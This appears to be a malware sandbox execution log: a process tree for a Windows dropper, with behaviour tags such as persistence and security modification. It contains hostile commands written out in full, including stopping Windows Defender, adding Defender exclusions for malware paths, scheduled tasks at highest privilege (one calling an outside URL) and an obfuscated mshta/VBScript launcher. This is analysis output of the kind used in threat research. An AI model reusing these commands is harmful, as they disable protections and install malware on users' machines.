C:\Users\Admin\AppData\Local\chromedrlver.exe"C:\Users\Admin\AppData\Local\chromedrlver.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\877E.exeC:\Users\Admin\AppData\Local\Temp\877E.exe2⤵
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\cc393749-fc75-468c-a5ce-51db373dc6bf\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\cc393749-fc75-468c-a5ce-51db373dc6bf\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\cc393749-fc75-468c-a5ce-51db373dc6bf\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cc393749-fc75-468c-a5ce-51db373dc6bf\test.bat"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\3f50dfb5-768c-4473-ae46-8ce233874c5a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\3f50dfb5-768c-4473-ae46-8ce233874c5a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3f50dfb5-768c-4473-ae46-8ce233874c5a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3f50dfb5-768c-4473-ae46-8ce233874c5a\test.bat"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Windows\system32\sc.exesc stop windefend5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe"3⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\1575c84f-7a06-4aa4-9075-6954c0641724\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\1575c84f-7a06-4aa4-9075-6954c0641724\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1575c84f-7a06-4aa4-9075-6954c0641724\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1575c84f-7a06-4aa4-9075-6954c0641724\test.bat"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\73b2ae87-19ce-4f7a-a84a-fd146112f6af\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\73b2ae87-19ce-4f7a-a84a-fd146112f6af\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\73b2ae87-19ce-4f7a-a84a-fd146112f6af\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73b2ae87-19ce-4f7a-a84a-fd146112f6af\test.bat"5⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵
- Blocklisted process makes network request
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
- Modifies WinLogon for persistence
-
-
-
C:\Users\Admin\AppData\Local\Temp\4C27.exeC:\Users\Admin\AppData\Local\Temp\4C27.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8516 -s 4643⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8516 -s 4843⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\7FAC.exeC:\Users\Admin\AppData\Local\Temp\7FAC.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 460629855e209cd5b16a907274503a56 gT42+laoRUGWqQMp0E2DMg.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\system32\MoNotificationUx.exe%systemroot%\system32\MoNotificationUx.exe /ClearActiveNotifications3⤵
-
-
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed128c2773227671b3f.exeWed128c2773227671b3f.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed128c2773227671b3f.exeC:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed128c2773227671b3f.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\is-OAD66.tmp\Wed120b6f5c6d562.tmp"C:\Users\Admin\AppData\Local\Temp\is-OAD66.tmp\Wed120b6f5c6d562.tmp" /SL5="$601E6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe"C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe" /SILENT2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-EF6K8.tmp\Wed120b6f5c6d562.tmp"C:\Users\Admin\AppData\Local\Temp\is-EF6K8.tmp\Wed120b6f5c6d562.tmp" /SL5="$10214,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed120b6f5c6d562.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed121f7e9e92793cf.exeWed121f7e9e92793cf.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed121f7e9e92793cf.exeC:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed121f7e9e92793cf.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed1229427acd4bc167.exeWed1229427acd4bc167.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\kbTxHZeYOomBllay3dpYIR9f.exe"C:\Users\Admin\Pictures\Adobe Films\kbTxHZeYOomBllay3dpYIR9f.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\XjhsglKxkrcTUd6de5gbWXb0.exe"C:\Users\Admin\Pictures\Adobe Films\XjhsglKxkrcTUd6de5gbWXb0.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe"C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\e4ccc496-8308-4c13-89c2-d69b0ff5af01\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e4ccc496-8308-4c13-89c2-d69b0ff5af01\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e4ccc496-8308-4c13-89c2-d69b0ff5af01\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e4ccc496-8308-4c13-89c2-d69b0ff5af01\test.bat"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\4ee538e0-75c4-4cc0-916e-b1b2320d2c64\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\4ee538e0-75c4-4cc0-916e-b1b2320d2c64\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\4ee538e0-75c4-4cc0-916e-b1b2320d2c64\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4ee538e0-75c4-4cc0-916e-b1b2320d2c64\test.bat"4⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IjhdP4nV_bnmATIamZ0oM7vu.exe"C:\Users\Admin\Pictures\Adobe Films\IjhdP4nV_bnmATIamZ0oM7vu.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "https://nougacoush.com/link?z=4569148" /tn "AV GORelease" /sc ONCE /st 8:36 /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\NVg1F8f9lhkegqhXkgZUzsJM.exe"C:\Users\Admin\Documents\NVg1F8f9lhkegqhXkgZUzsJM.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\lFtg__C2Cpn8OrS7hJpY6clc.exe"C:\Users\Admin\Pictures\Adobe Films\lFtg__C2Cpn8OrS7hJpY6clc.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\7wc747c0WC3BtyLOOlwG6L2V.exe"C:\Users\Admin\Pictures\Adobe Films\7wc747c0WC3BtyLOOlwG6L2V.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Ty99QgeWSf6Pce3WUVUYdTgp.exe"C:\Users\Admin\Pictures\Adobe Films\Ty99QgeWSf6Pce3WUVUYdTgp.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\Ty99QgeWSf6Pce3WUVUYdTgp.exe"C:\Users\Admin\Pictures\Adobe Films\Ty99QgeWSf6Pce3WUVUYdTgp.exe" -u5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Drops file in Windows directory
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rs8yrkYmjEo9RI0FOwCgCQdY.exe"C:\Users\Admin\Pictures\Adobe Films\rs8yrkYmjEo9RI0FOwCgCQdY.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\_iDddTFaQKFX_GczW_SlobM1.exe"C:\Users\Admin\Pictures\Adobe Films\_iDddTFaQKFX_GczW_SlobM1.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 2765⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9o14HWoUEuSmMPlQMLbWUqDC.exe"C:\Users\Admin\Pictures\Adobe Films\9o14HWoUEuSmMPlQMLbWUqDC.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 3005⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dtIpIQ_qtf_Fq6mF3YqSxzxN.exe"C:\Users\Admin\Pictures\Adobe Films\dtIpIQ_qtf_Fq6mF3YqSxzxN.exe"4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"6⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1d8,0x1d4,0x1d0,0x1fc,0x1cc,0x7ff86f36dec0,0x7ff86f36ded0,0x7ff86f36dee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6a57f9e70,0x7ff6a57f9e80,0x7ff6a57f9e908⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1784,16950138151266137069,1560590402343067924,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7532_322797412" --mojo-platform-channel-handle=1640 /prefetch:87⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe"C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\twj_PyqVenFial9ZxFhPbo72.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "twj_PyqVenFial9ZxFhPbo72.exe"7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TyORHIs1LZXKQSe6l2yLpqNb.exe"C:\Users\Admin\Pictures\Adobe Films\TyORHIs1LZXKQSe6l2yLpqNb.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DMAEN.tmp\TyORHIs1LZXKQSe6l2yLpqNb.tmp"C:\Users\Admin\AppData\Local\Temp\is-DMAEN.tmp\TyORHIs1LZXKQSe6l2yLpqNb.tmp" /SL5="$2057A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\TyORHIs1LZXKQSe6l2yLpqNb.exe"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-M2R22.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-M2R22.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\3f-13f31-265-71f9d-fda5c0e745153\Fajulaelaeda.exe"C:\Users\Admin\AppData\Local\Temp\3f-13f31-265-71f9d-fda5c0e745153\Fajulaelaeda.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\llsivpsf.og2\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\llsivpsf.og2\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\llsivpsf.og2\GcleanerEU.exe /eufive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6460 -s 23610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xgfcv3dd.zz0\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\xgfcv3dd.zz0\installer.exeC:\Users\Admin\AppData\Local\Temp\xgfcv3dd.zz0\installer.exe /qn CAMPAIGN="654"9⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe & exit8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exeC:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe"C:\Users\Admin\AppData\Local\Temp\plhzcy0y.s1f\any.exe" -u10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yejujauk.caq\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\yejujauk.caq\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\yejujauk.caq\gcleaner.exe /mixfive9⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dy1l3ab4.gs5\autosubplayer.exe /S & exit8⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ArGiap3960SUZs1dAEDT_gNj.exe"C:\Users\Admin\Pictures\Adobe Films\ArGiap3960SUZs1dAEDT_gNj.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Pictures\Adobe Films\RfdHYMkUrnVfH1ZtERmjgC7e.exe"C:\Users\Admin\Pictures\Adobe Films\RfdHYMkUrnVfH1ZtERmjgC7e.exe"2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\ImBQvx_Kr5O0lBuAItFuMM0V.exe"C:\Users\Admin\Pictures\Adobe Films\ImBQvx_Kr5O0lBuAItFuMM0V.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed126ca6605dbec0399.exeWed126ca6605dbec0399.exe /mixone1⤵
- Executes dropped EXE
-
